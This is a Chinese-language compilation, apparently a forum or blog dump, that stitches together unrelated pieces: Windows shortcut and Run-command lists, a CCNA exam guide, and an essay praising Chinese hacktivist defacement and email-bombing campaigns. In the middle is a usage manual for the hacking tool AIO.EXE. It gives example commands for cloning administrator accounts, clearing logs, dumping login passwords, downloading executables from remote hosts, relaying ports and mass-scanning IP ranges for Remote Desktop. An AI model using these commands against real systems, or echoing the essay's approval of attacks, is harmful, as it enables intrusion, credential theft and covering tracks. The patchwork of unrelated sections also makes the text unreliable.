F1　　　　　　　　　　　     显示当前程序或者windows的帮助内容。

F2　　　　　　　　　　　     当你选中一个文件的话，这意味着“重命名”

F3　　　　　　　　　　　     当你在桌面上的时候是打开“查找：所有文件”对话框

F10或ALT　　　　　　　　    激活当前程序的菜单栏

windows键或CTRL+ESC　　 打开开始菜单

CTRL+ALT+DELETE　　　　 在win9x中打开关闭程序对话框

DELETE　　　　　　　　　     删除被选择的选择项目，如果是文件，将被放入回收站

SHIFT+DELETE　　　　　      删除被选择的选择项目，如果是文件，将被直接删除而不是放入回收站

CTRL+N　　　　　　　　　    新建一个新的文件

CTRL+O　　　　　　　　　    打开“打开文件”对话框

CTRL+P　　　　　　　　　     打开“打印”对话框

CTRL+S　　　　　　　　　     保存当前操作的文件

CTRL+X　　　　　　　　　     剪切被选择的项目到剪贴板

CTRL+INSERT 或 CTRL+C　  复制被选择的项目到剪贴板

SHIFT+INSERT 或 CTRL+V　 粘贴剪贴板中的内容到当前位置

ALT+BACKSPACE 或 CTRL+Z 撤销上一步的操作

ALT+SHIFT+BACKSPACE　　 重做上一步被撤销的操作

Windows键+M　　　　　　     最小化所有被打开的窗口。

Windows键+CTRL+M　　　　重新将恢复上一项操作前窗口的大小和位置

Windows键+E　　　　　　     打开资源管理器

Windows键+F　　　　　　     打开“查找：所有文件”对话框

Windows键+R　　　　　　     打开“运行”对话框

Windows键+BREAK　　　　   打开“系统属性”对话框

Windows键+CTRL+F　　　    打开“查找：计算机”对话框

SHIFT+F10或鼠标右击　　      打开当前活动项目的快捷菜单

SHIFT　　　　　　　　　        在放入CD的时候按下不放，可以跳过自动播放CD。在打开word的时候按下不放，可以跳过自启动的宏

ALT+F4　　　　　　　　　     关闭当前应用程序

ALT+SPACEBAR　　　　　　  打开程序最左上角的菜单

ALT+TAB　　　　　　　　      切换当前程序

ALT+ESC　　　　　　　　      切换当前程序

ALT+ENTER　　　　　　　      将windows下运行的MSDOS窗口在窗口和全屏幕状态间切换

PRINT SCREEN　　　　　　    将当前屏幕以图象方式拷贝到剪贴板

ALT+PRINT SCREEN　　　　  将当前活动程序窗口以图象方式拷贝到剪贴板

CTRL+F4　　　　　　　　      关闭当前应用程序中的当前文本（如word中）

CTRL+F6　　　　　　　　      切换到当前应用程序中的下一个文本（加shift 可以跳到前一个窗口）

---

在Internet Explorer中：

ALT+RIGHT ARROW 显示前一页（前进键）

ALT+LEFT ARROW　显示后一页（后退键）

CTRL+TAB在页面上的各框架中切换（加shift反向）

F5　刷新

CTRL+F5 强行刷新目的 快捷键

激活程序中的菜单栏 F10

执行菜单上相应的命令 ALT+菜单上带下划线的字母

关闭多文档界面程序中的 CTRL+ F4

当前窗口

关闭当前窗口或退出程序 ALT+ F4

复制 CTRL+ C

剪切 CTRL+ X

删除 DELETE

显示所选对话框项目的帮助 F1

显示当前窗口的系统菜单 ALT+空格键

显示所选项目的快捷菜单 SHIFT+ F10

显示“开始”菜单 CTRL+ ESC

显示多文档界面程序的系统菜单 ALT+连字号(-)

粘贴 CTR L+ V

切换到上次使用的窗口或者 ALT+ TAB

按住 ALT然后重复按TAB切

换到另一个窗口

撤消 CTRL+ Z

---

目的 快捷键
如果当前选择展开了,要折叠 NUM LOCK+负号(-)
或者选择父文件夹左箭头折
叠所选的文件夹
如果当前选择折叠了，要展开 NUM LOCK+*
或者选择第一个子文件夹右箭
头展开当前选择下的所有文件夹
展开所选的文件夹 NUM LOCK+加号(+)
在左右窗格间切换 F6

---

使用 WINDOWS键

可以使用 Microsoft自然键盘或含有 Windows徽标键的其他任何兼容键盘的以下快捷键。

在任务栏上的按钮间循环 WINDOWS+ TAB
显示“查找：所有文件” WINDOWS+ F
显示“查找：计算机” CTRL+ WINDOWS+ F
显示“帮助” WINDOWS+ F1
显示“运行”命令 WINDOWS+ R
显示“开始”菜单 WINDOWS
显示“系统属性”对话框 WINDOWS+ BREAK
显示“Windows资源管理器” WINDOWS+ E
最小化或还原所有窗口 WINDOWS+ D
撤消最小化所有窗口 SHIFT+ WINDOWS+ M

---

“我的电脑”和“Windows资源管理器”的快捷键

 

关闭所选文件夹及其所有父文件夹　 按住 SHIFT键再单击“关闭按钮（仅适用于“我的电脑”）
向后移动到上一个视图 ALT+左箭头
向前移动到上一个视图 ALT+右箭头
查看上一级文件夹 BACKSPACE

---

使用对话框中的快捷键

取消当前任务 ESC
如果当前控件是个按钮，要单击该按钮或者如果当前控件是个复选框，要选择或清除该复选框
或者如果当前控件是个选项按钮，要单击该选项空格键
单击相应的命令 ALT+带下划线的字母
单击所选按钮 ENTER
在选项上向后移动 SHIFT+ TAB
在选项卡上向后移动 CTRL+ SHIFT+ TAB
在选项上向前移动 TAB
在选项卡上向前移动 CTRL+ TAB
如果在“另存为”或“打开” BACKSPACE
对话框中选择了某文件夹， 要
打开上一级文件夹
在“另存为”或“打开”对话框 F4
中打开“保存到”或“查阅”
刷新“另存为”或“打开” 对话框 F5

---

Windows系统:开始--运行--命令大全
Nslookup-------IP地址侦测器                           explorer-------打开资源管理器
logoff---------注销命令                               tsshutdn-------60秒倒计时关机命令
lusrmgr.msc----本机用户和组                           services.msc---本地服务设置
oobe/msoobe /a----检查XP是否激活                      notepad--------打开记事本
cleanmgr-------垃圾整理                               net start messenger----开始信使服务
compmgmt.msc---计算机管理                             net stop messenger-----停止信使服务
conf-----------启动netmeeting                         dvdplay--------DVD播放器
charmap--------启动字符映射表                         diskmgmt.msc---磁盘管理实用程序
calc-----------启动计算器                             dfrg.msc-------磁盘碎片整理程序
chkdsk.exe-----Chkdsk磁盘检查                         devmgmt.msc--- 设备管理器
regsvr32 /u *.dll----停止dll文件运行                  drwtsn32------ 系统医生
rononce -p ----15秒关机                               dxdiag---------检查DirectX信息
regedt32-------注册表编辑器                           Msconfig.exe---系统配置实用程序
rsop.msc-------组策略结果集                           mem.exe--------显示内存使用情况
regedit.exe----注册表                                 winchat--------XP自带局域网聊天
progman--------程序管理器                             winmsd---------系统信息
perfmon.msc----计算机性能监测程序                     winver---------检查Windows版本
sfc /scannow-----扫描错误并复原
taskmgr-----任务管理器（2000／xp／2003
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介（安装完成后出现的漫游xp程序）
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具，系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

 

CCNA考试步骤

一、问卷调查

    考试系统分为VUE和赛尔文两种，系统不同，开始的问卷调查内容也略有不同，但是不用担心，统选B相对安全，选完一道点NEXT，一直到END。因为B选项通常表示考生水平一般，抽取的考题也不会太难。注意：其中有一个调查是问你是否已满18周岁，一定要选已满18周岁。

    最后一个调查是问你是否同意CISCO的协议，这个一定要选“同意”，如果您选“不同意”，那么你也就不用考试了。曾经有位仁兄选了不同意，结果题目一直没有出现，一问考场，人家解释：你连CISCO的协议都不同意，你还考什么？不用考了。要想再考，得再交一次考试费，重新注册这门考试。

    协议过后，调查问卷页面右下角点END选项，考试系统自动开始从服务器抽取题目，题目前一天已由考试中心从澳洲下载完毕，暂存于服务器中。数秒后，题目抽取完毕，考生可点START，正式考试开始。

    二、正式考试

    同一考点同一天考同一科目的人，当天题目一般变化不会太大。考试中，不允许标记和后退，一旦点击NEXT，则不可返回上一道试题修改。题目为55-65道，中国是120分钟考试时间，1000分为满分，考到849分就通过。考试时间很充足，第一次考试的人可能会紧张，其实只要准备充分，考试时间还是足够的，这一点可以放心。

    题型多为客观选择题，单选或多选，一般选几个有提示，或告诉你选所有认为对的答案。接下来是实验题，比如：让你使用相关命令，使网络配通，先在各个路由器上show run, 查看命令是否完整。做完后别忘记copy, 然后使用ping检验。

    在考试中也有可能会碰到死机现象，不用紧张，赶紧告诉监考官，他们会解决的。重新启动，继续做题，以前做的题目结果仍然存在，只是死机当时正在做的题目可能会没有存上，一定要仔细检查一下，再选NEXT继续。

    全部题目做完，选END EXAM，跳出试卷。

    考试结束，激动人心的时刻来了！马上就会看到考试结果，显示绿条，恭喜你！通过考试了！！

    走出考场，考官正在打印你的成绩单，盖上钢印。成绩单要保存好，上面有你的ID号、分数及各部分考点的考试情况，还有将来注册时的网址及相关信息。

    三、考后注册

    考试通过后十天内，请到思科网站注册考生个人信息。

    以前很多考生都未重视考试注册，让别人或考试中心代注册，往往造成收不到证书或将来考其他科目无法更改考生个人信息的情况，所以，考试注册一定要自己来！密码不要轻易告诉别人。

    如果想收证书收得快一点，可以在个人信息表中用本国语言写上通信地址。个人信息表通讯地址分为三部分，进入后第一部分是由考试中心已经填好的，你需要检验一下，地址、邮编、E-MAIL必须正确无误；第二部分空着不填；第三部分，可以用本国语言填上通讯地址，跟第一部分内容对应即可。（上面注明，可用中文、日文、韩文等填写）

    注册成功！

    静候6-8周，思科会把证书按照你填的地址发过来。

    证书是按平信的方式邮出，里面包括：考生卡片一张、思科总裁约翰 钱伯斯签发的祝贺信、CCNA证书。

AIO.EXE 使用说明
AutoRun -> 查看一般登陆后启动的项
用法:Aio.exe -AutoRun

2.Clone -> 克隆帐户
用法: Aio.exe -Clone 正常帐号 要被克隆帐户 密码
例子: Aio.exe -Clone Administrator Guest test
帮助: Aio.exe -Clone
不需要在system权限下也可用

3.CheckClone -> 检测克隆帐户
用法: Aio.exe -CheckClone
不需要在system权限下也可用

4.CleanLog -> 清除日志
用法: Aio.exe -CleanLog

5.ConfigService -> 修改服务的启动类型
用法: Aio.exe -ConfigService 服务器 启动类型
例子: Aio.exe -ConfigService W3svc Demand ->手动启动
例子: Aio.exe -ConfigService W3svc Auto ->自动启动
例子: Aio.exe -ConfigService W3svc Disabled ->禁止启动
帮助: Aio.exe -ConfigService

6.DelUser -> 删除系统帐户
用法: Aio.exe -DelUser 帐户
例子: Aio.exe -DelUser Guest
帮助: Aio.exe -DelUser
(注意: 可以删除系统内建帐号,象Administrator,Guest等,小心使用)

7.EnumService -> 列举系统服务
用法: Aio -EnumService All|Running|Stopped
例子: Aio -EnumService All -> 列举所有服务
例子: Aio -EnumService Running -> 列举正在运行的服务
例子: Aio -EnumService Stopped -> 列举停止了的服务
帮助: Aio -EnumService

8.FHS -> 检查系统隐藏服务
用法: Aio.exe -FHS

9.FGet -> FTP下载
用法: Aio.exe -FGet FTP地址 端口 用户名 密码 要下载文件名
例子: Aio.exe -FGet 12.12.12.12 21 test test a.exe
例子: Aio.exe -FGet 12.12.12.12 21 test test *.exe (下载所有exe文件)
帮助: Aio.exe -FGet

10.FindPassword -> 得到NT/2K所有登陆系统用户密码
用法: Aio.exe -FindPassword

11.InstallService -> 安装服务
用法: Aio.exe -InstallService 服务名 文件名
例子: Aio.exe -InstallService test test.exe
帮助: Aio.exe -InstallService

11.InstallService -> 安装驱动
用法: Aio.exe -InstallDrver 服务名 驱动文件名
例子: Aio.exe -InstallDriver test test.sys
帮助: Aio.exe -InstallDriver

12.KillTCP -> 杀掉一个TCP连接
用法: Aio.exe -KillTCP 本地IP 本地端口 远程地址 远程端口
例子: Aio.exe -KillTCP 192.168.1.1 80 61.61.61.61 7890
帮助: Aio.exe -KillTCP
(参数可以通过netstat -an得到)

13.LogOff -> 注销系统
用法: Aio.exe -LogOff

14.MGet -> HTTP下载文件
用法: Aio.exe -MGet URL <保存为文件名>
例子: Aio.exe -MGet http://www.abc.com/test.exe abc.exe
帮助: Aio.exe -MGet

15.MPort -> 端口和程序关连映射
用法: Aio.exe -Mport

16.Never -> 将系统帐户登陆次数重置为0
用法: Aio.exe -Never 帐户
例子: Aio.exe -Never Guest
帮助: Aio.exe -Never

17.PowerOff -> 关机,关电源
用法: Aio.exe -PowerOff

18.Pslist -> 列进程
用法: Aio.exe -Pslist

19.Pskill -> 杀进程
用法: Aio.exe -Pskill PID|进程名
例子: Aio.exe -Pskill 3465
例子: Aio.exe -Pskill Iexplore

20.PortScan -> 端口扫描(Syn和TCP扫描)
用法: Aio.exe -PortScan Syn|TCP -S 起始地址 -E 终止地址 -P 端口列表 -T 线程数 </Banner> </TS> </S5> </Save>
例子: Aio.exe -PortScan Syn -S 61.129.1.1 -E 61.129.1.255 -P 3389 -T 512 /TS -> 扫描61.129.1.1到61.129.1.255的主机的3389端口,检查是否打开的是终端
例子: Aio.exe -PortScan Syn -S 61.129.12.12 -P 1-65535 -T 512 /TS -> 扫描61.129.12.12主机65535个端口,检查哪个端口打开的终端服务
例子: Aio.exe -PortScan Syn -S 61.129.12.12 -P 1-65535 -T 512 /S5 -> 扫描61.129.12.12主机65535个端口,检查哪个端口打开的Socks5服务
帮助: Aio.exe -PortScan
(更多用法,请参考我发布的SynScan)
这个功能的用法是最多的,而且也是很强大的.(Syn扫描只适用于2K或以上系统)

21.PortRelay -> TCP数据转发
用法: Aio.exe -PortRelay 本地绑定端口 转发至的IP 转发至端口
例子: Aio.exe -PortRelay 3389 211.12.12.12 3389
帮助: Aio.exe -PortRelay

22.Reboot -> 重启系统
用法: Aio.exe -Reboot

23.RemoveService -> 删除服务
用法: Aio.exe -RemoveService 要删除的服务
例子: Aio.exe -RemoveService test
帮助: Aio.exe -RemoveService

24.StartService -> 启动服务
用法: Aio.exe -StartService 要启动的服务
例子: Aio.exe -StartService test
帮助: Aio.exe -StartService

25.StopService -> 停止服务
用法: Aio.exe -StopService 要停止的服务
例子: Aio.exe -StopService Test
帮助: Aio.exe -StopService

26.Sysinfo -> 查看系统信息
用法: Aio.exe -Sysinfo

27.ShutDown -> 关机
用法: Aio.exe -ShutDown

28.Terminal -> 安装终端服务(2K/XP/2003中都适用)
用法: Aio.exe -Terminal 端口
例子: Aio.exe -Terminal 3389
帮助: Aio.exe -Terminal

29.Unhide -> 查看星号密码(NT系统有效)
用法: Aio.exe -Unhide

30.WinInfo -> 查看帐户信息等
用法: Aio.exe -WinInfo <帐户>
例子: Aio.exe -WinInfo
例子: Aio.exe -WinInfo Guest

2004 年的最后一天，“中国红客联盟”（ HUC ）的核心人物 Lion 通过网站宣布“红客联盟解散，网站关闭”。

即日起，中国红客联盟网站在空白上的首页上仅呈现简单的一句话“ HUC is dismissed&****;** 2004/12/31 ”。

稍后，这一消息陆续出现在国内一些论坛，并延续到 2 月初，但只是产生小小的涟漪，并未产生较大的反响，也未见国内新闻媒体报道，倒是香港《文汇报》在 2 月 8 日做了一个重点报道，醒目的标题为《全国最大骇客组织解散》（说明：港台地区将“ hacker ”一词译作“骇客”）。

最初，“黑客”（ hacker ）【注 1 】是一个褒义词，指的是那些具有独创能力的编程人员，他们对任何*作系统都感兴趣，能够积极探寻出系统所存在的漏洞及其原因，同时找到解决的方法。然而今天“黑客”已是一个贬义词，主要指网络非法入侵者，即强行进入他人计算机信息系统，或恶意干扰对方工作，或从事窃取数据乃至破坏等违法犯罪活动的分子。用黑客自己的话来说，就是“强行撬锁（ Picking ），未经许可侵入内部”

在黑客的行为中，有一种是出于政治目的而实施的“强行撬锁”，这种行为可以是个体实施的，也可以是群体实施的，可以是针对他国的，也可以是针对本国的。它是伴随激烈的国际国内政治冲突而发生的，反过来又会对冲突起到火上加油的作用。

在国际冲突中，以往传统媒体大都担负起宣传战的重要角色，互联网传播当然也具有同样的作用，然而互联网传播与传统媒体传播不同的是，它还可以成为发生冲突的国家间或敌对民族间互相攻击的工具。涂改网页、删改数据、堵塞访问通路、施放病毒等黑客攻击手段，是伴随国际冲突时最常见的状况，它已成为审视地区局势紧张与否国家关系好坏与否的晴雨表。出于政治目的实施的黑客攻击往往具有群体性、规模大、火力猛、持续时间长等特点。当然，一旦发生这种情况，双方的国家机器都会给予高度关注，并采取相应措施。

从 1998 年到 2001 年，中国黑客大规模的对外群体攻击共发生过六次。从理性的角度说，一切黑客攻击行为都应受到谴责；但从感性的角度看，中国黑客的这六次攻击都事出有因，强烈地表现出“人不犯我，我不犯人；人若犯我，我必犯人”。中国黑客是中国互联网上第一批产生了重大影响的“客”群体，而这种影响正是在出于政治目的对外实施大规模群体攻击的六次行动中产生的。当年这群充满激情和钻研精神的年轻人，不仅以自己掌握的技术手段维护祖国尊严，更重要的是，在中国互联网刚刚兴起之际，带动了国内网络安全概念的树立和相关技术的发展。

在中国红客联盟宣布解散之际，我将自己尚未出版的著作中的某章第二节（未定稿）首先在网上发表（由于篇幅有限，仅提供 10 幅截屏图），谨以此文献给具有正义感和充满激情的中国黑客。

第二节 中国黑客曾以“红客”给自己冠名，一时成为爱国主义、民族主义的集中体现

中国大陆黑客对外发起大规模的群体攻击，先后发生过六次：第一次在 1998 年 8 月，起因为印度尼西亚在暴乱事件中凌虐华人妇女侵害华人利益；第二次在 1999 年 5 月，起因为以美国为首的北约空军用导弹袭击中国驻南联盟大使馆并造成三名中国记者死亡；第三次在 1999 年 7 月，起因为李登辉抛出“两国论”公然挑战“一个中国”的原则；第四次在 2000 年 1 月，起因为日本右翼在大阪集会否定南京大屠杀；第五次在 2001 年 2 、 3 月间，起因为中日两国关系间的一系列摩擦，如三菱车事件【注 2 】、日航事件【注 3 】、教科书事件【注 4 】、《台湾论》事件【注 5 】、小泉参拜靖国神社【注 6 】等；第六次在 2001 年 4 月，起因为美国 EP3 侦察机在南海上空与中国战斗机相撞导致飞行员王伟死亡。从这六次攻击看，中国黑客都是在当时政治事件的大背景下，基于爱国主义和民族主义情怀的一种必然反应。

第一次： 1998 年 8 月攻击印尼网络

1998 年 5 月，印度尼西亚发生动乱。在此期间，大批华人受到迫害，华人妇女遭到令人发指的强暴。至 7 、 8 月，事件真相才通过互联网陆续透漏出来。在国内新闻媒体不报道此事的情况下，中国网民通过互联网陆续获得了相关信息。 8 月初，全球华人社会形成抗议高潮， 8 月 7 日，世界各地华人更同步举行抗议示威。印尼暴徒的行为激怒了刚刚学会蹒跚走步的中国黑客们，他们不约而同聚集在聊天室（ IRC ）中，讨论并决定对向印尼网站攻击。这是中国黑客的第一次对外群体性攻击行动，其表现出的团结与协调成为今后类似攻击行动的典范。

8 月 7 日 ， ChinaByte 责任编辑在网站论坛中发现一个新帖。这一“帖子”声称中国黑客袭击了印尼站点，同时附上了尚未恢复原貌的站点网址。编辑印证后当即决定立即在每日发送给订户的新闻邮件中，首次增发“号外”。“号外”中只有简单两句话及一个网址，但包含了这一新闻事件的核心信息。全文为：“你的站点已被来自中国的‘黑客’所 ‘黑’，印尼的暴徒你们的暴行是会有报应的！！！（中文）’‘停止屠杀华人！！！’（英文）这是印尼一个‘ to kobudi.co.id ’的站点上日前出现的文字。这一站点目前被中国黑客小组所‘黑’。”

这一“号外”几分钟里就发送到数万订户的邮箱中。 8 月 10 日 ， ChinaByte 更将相关新闻上了主页头条。标题赫然为：印尼排华暴行激怒中国黑客。副题为：网上怒潮连天起。

实际上，早在 8 月 7 日之前，中国黑客已对印尼网站和电子邮箱展开攻击行动。他们通过破解密码而拥有了系统管理员的权利，将“苦难的同胞，我为你悲愤哭泣！”、“严惩暴徒！严惩凶手！血债血还！”等口号写在了印尼网站的首页上。他们同时还提供大量印尼重要部门的电子信箱，并向网友提供如何“轰炸”这些电子信箱的方法。 8 月 17 日是印尼国庆日，这一天众多印尼网站再次遭到黑客的攻击，被黑网站首页都留有黑客们用不太连贯的英文以及中文声讨印尼排华暴行的词句。其中一名署名“ Warning From Chinese ”的黑客，在被黑的页面上留言道，他这样做只是提醒人们不要忘记５月间发生的惨案，此举并不会造成该网站数据的丢失，但警告系统管理员必须将被黑页面保留 48 小时。这名黑客显然是为了让大家记住那场持续了 48 小时的排华暴乱。

中国黑客的攻击引起印尼政府强烈的反应，他们将中国民间黑客的行为指责为中国政府的怂恿，并指出是中国谋求地区霸权的强烈信号。据当时“美国之音” 8 月 9 日报道，印尼一名政府官员今日抗议“中国黑客”的“暴行”，据他说在 8 月 7 日以来，印尼至少有十余个互联网站，被自称“中国黑客”的组织摧毁，少数被贴上各种恐怖的图片，大部分被彻底破坏。另外 8 月 7 日几乎所有的印尼政府公用邮箱均遭到了邮件炸弹的疯狂轰炸。该官员竟说：“我们希望中国人保持理智，因为前一阶段的事情是我们自己的事情！如果中国人不想分清华人和中国人的区别，那就说明中国是一个充满威胁的国家，中国不能把有华人的地方都看作他的领土。五十年代中国派来了军舰，我们可以理解，因为他们接走的是自己国家的人，今天中国黑客来了，我们迷惑，因为他们对我们自己的事情横加干涉。谁都知道，没有中国政府的授意，中国妇联是不会抗议的，中国政府不仅干涉我们的内政，而且挑唆国内黑客对我们的攻击。我们十分不满！” 8 月 11 日，印尼政府电子技术主管官员就中国黑客行为再度发言。他说：“虽然黑客攻击给印尼造成了很大的损失，但他表示对民间的激愤他表示理解。但，印尼的问题是否象宣传的那样严重，大可不必听信过于危言耸听的报道。印尼政府会把自己的问题处理好。在被问及黑客攻击的损失时，他说有上百个个网站被攻击，其中十几个被侵入，大部分遭到破坏，有黑客试图攻击金融系统，造成了一定损失。另外 8 月 7 日当天，印尼的网络异常拥挤，当天的政府邮件系统几乎瘫痪，给印尼的正常社会秩序造成了一定影响。但这位发言人话题一转，再次耸人听闻地说道：“完全有把握说，中国的大量 ISP 凭借带宽的优势对我们进行了长达 30 个小时的邮件轰炸，我们很难说这不是有组织的行动。如果不是防空警报没响，我一定以为中国对我们宣战了。不过，谁的网络都有漏洞，任何民族都有黑客，我们不希望这是两个伟大民族仇恨的开端。我过去不相信中国威胁，现在我知道了不该听信中国政府口头上的什么政策，仅仅是他的十亿公民在政府偷偷怂恿下发泄一下不满，就是一种可怕的力量。”他最后说：“我敢打赌，黑客事件仅仅是中国人对他们地区称霸的一个信号，当他们踏上我们的国土，开始说三道四时，大家就会觉得‘中国威胁’多么贴切，东盟的朋友，应该首先记住！”

第二次： 1999 年 5 月攻击美国网络

在 1999 年科索沃战争初期，中国黑客并没有对美国及北约国家网站采取太多的过激行为。然而，当中国驻南联盟大使馆遭到导弹攻击后，形势陡然大变。中国网民立刻在网上掀起了抗议浪潮，其声势决不亚于中国大学生和中国民众在美国驻华使领馆门前举行抗议活动的声势。与此同时，中国黑客无法忍受同胞被害、使馆被炸、民族尊严遭到侵犯，对美国及北约的政府、军事站点展开了持续多日的猛烈攻击。与对印尼网站攻击相比，结果是一呼百应，使攻击的规模和战果远远超过第一次，美国驻华使馆、白宫及美国和北约的众多网站或首页内容被改，或系统彻底瘫痪。

5 月 8 日 ，当广大网友通过各种途径陆续获得我使馆被炸后，犹如听到了警报，立刻纷纷上网。一位署名“九大王”的网友，于 5 月 11 日贴出的一则的贴子《网络人民战争——网上抗美风潮亲历记》，生动地描绘了当时网上的情况，他最后写道：“这是一场真正的网（络）人（民）战争：在聊天室、在论坛，广大的网友们十指加键盘，与形形色色的汉奸、台独分子和其他仇视中国的人们做斗争；在后方，很多人在自己的主页上迅速加入抗议北约暴行的文字和图片，组成反北约站线联盟，他们的 ICQ 、 FrongPage 、 CUTEFTP ……一直开着，随时从战友那里得到最新情报，随时更新、上传；战斗在最前线的是特种兵——中国的黑客们，他们在最危险的地方进行着特殊的战斗……以上是我 5 月 8 日 夜及 9 日凌晨的网上亲历，从 8 日早晨上午 9 点到次日早晨将近 24 个小时里，其间我只吃了一顿午饭。 9 日 8 点以后的事不再记述，有消息说美国有 300 多个站点在 5 月 9 日 被黑。 1999 年 5 月 8 日的夜晚，对无数中国网民来说，都将是一个难以忘怀的夜晚，同样是一个百年难遇的不眠之夜。自世界上有互联网以来，从来没有一次能象这次一样能影响一个民族的情绪，虽然是对着计算机屏幕，但我能感觉到网友们那一颗颗拳拳爱国之心。我们感觉到所有的人都聚集在网络这一特殊的时空里，那种心情难以言表。” 众多网民及黑客在近一周的日子里，在夜里两三点甚至到凌晨四五点向其他网友道声“撑不住了”才下网，实在是司空见惯。

白宫首页从 5 月 8 日晚起便遭到多次修理，现在国内有的个人主页至少保存有四个被黑的不同版本。其中最精彩的一个版本是白宫主页上的两面星条旗被换成了海盗骷髅旗，中间白宫图片中白宫顶上的星条旗也被换成了骷髅旗。在对白宫网站攻击的行动中，来自香港的黑客也大显身手。短短几天内，中国黑客将三位遇难记者的遗像或强烈抗议的字句或纳粹克林顿的图片贴到了数百个美国政府、军队及驻华大使馆乃至北约的网站上。国内不少网站不断公布美国政府机构和军事机构的网址，如“中国龙”网站汇集了美国空军的大量网址，其中特别提到：“据调查，执行此次对我驻南使馆轰炸任务的是驻 Missouri Whiteman Air Force Base 的第 509th Bomb Wing 。即 B-2 空军基地。其网址是……（此处略），希望能有黑客高手前往狂轰滥炸。全体中国人民感谢您！！！ ”网上不时传来报捷的消息。 5 月 12 日下午 3 点左右，一位署名“老游击队员”的网友报告：“最新消息！美国空军一网站被中国黑客攻破！”原来一位“福建龙岩”署名“中国天行”的黑客，将朱颖父亲致克林顿的信（中英文）贴到了代表美国空军最高荣誉的“雷鸟”飞行表演大队的网页上。他留言到：“出于尊敬之缘故，没有完全修理原有网页，仅借半屏空间发表我烈士父亲给贵国总统的信，以表示对美国和美国空军最强烈的抗议。”

在此次黑客攻击行动中，不仅有天马行空的独行侠，更有众人组成黑客兵团形成超强战斗力。 5 月 9 日，一个名为“中国黑客紧急会议中心”的组织应运而生，它们在网页上公布了美国 250 多个网站的密码（仅是他们知道的极小部份），立即引起国内众多网友去攻击这些站点。该组织声称：“这仅是一个临时组织，成员来自中国各地。我们成立的原因是——北约的无理野蛮的挑衅，我们成立的目的——抗议，打破外国敌对新闻机构的新闻封锁，让世人都能看清楚美国和北约的霸权心态和禽兽行为。我们没有严密的分工和行动规则，我们甚至互不认识，但我们团结一心。我们坚决拥护中国政府和中国G.C.D的主张。我们不会在行动中留下任何证据。请公安部门放心，我们只是用自己代表全中国人民的心声的页面去替换北约军事站点的首页，我们不会删除或破坏他们的任何数据。只要中国人民和中国政府的最终目的全面地无条件地一达到，我们自然解散。但是，现在，我们在行动！”该组织于 5 月 16 日早 8 点发起了发起第三轮攻击，先后将美国海军海军与华盛顿通信中心（ BASS ）等多个军队站点的主页进行了彻底修理。

为了让更多的网友立刻掌握攻击手法，一时间网上布满了黑客技法速成。除了黑客高手修理美国网站的首页外，另一个克敌的手段便是使用“拼”（ PING ）即电子邮件炸弹捣毁对方的服务器。那几天，网上经常可见“让我们团结起来，邮件导弹就是我们的进攻武器，如果数十万人一起这么干的话会很快使该网站瘫痪”的号召；可见教授“拼”方法的具体设置步骤；可见发起总攻的时间表。这一群起而攻之的简单手段，由于广大网友的踊跃掌握并同时运用，产生了极大的杀伤力。 5 月 12 日 ，“美国之音”的中文电子邮件新闻报道说：“中国的抗议群众除了在中国各地发动抗议之外 , 还直接向美国白宫发出了大量表达不满的电子邮件。电子邮件数目之庞大，甚至在星期一使得白宫网站故障，不得不暂时关闭进行修复。白宫发言人表示，星期一傍晚，白宫实习生发现无法连上白宫的网站，白宫电脑部门人员才发现，电子邮件的数量庞大使得白宫网站不堪负荷而关闭，一直到星期二晚间才完全修复。这位发言人表示，这是白宫网站第一次因为大量电子邮件而造成故障。”

在中国驻南斯拉夫大使馆于北京时间 1999 年 5 月 8 日凌晨 遭北约轰炸后不到 12 个小时，美国驻中国大使馆网站即遭到中国黑客的攻击。

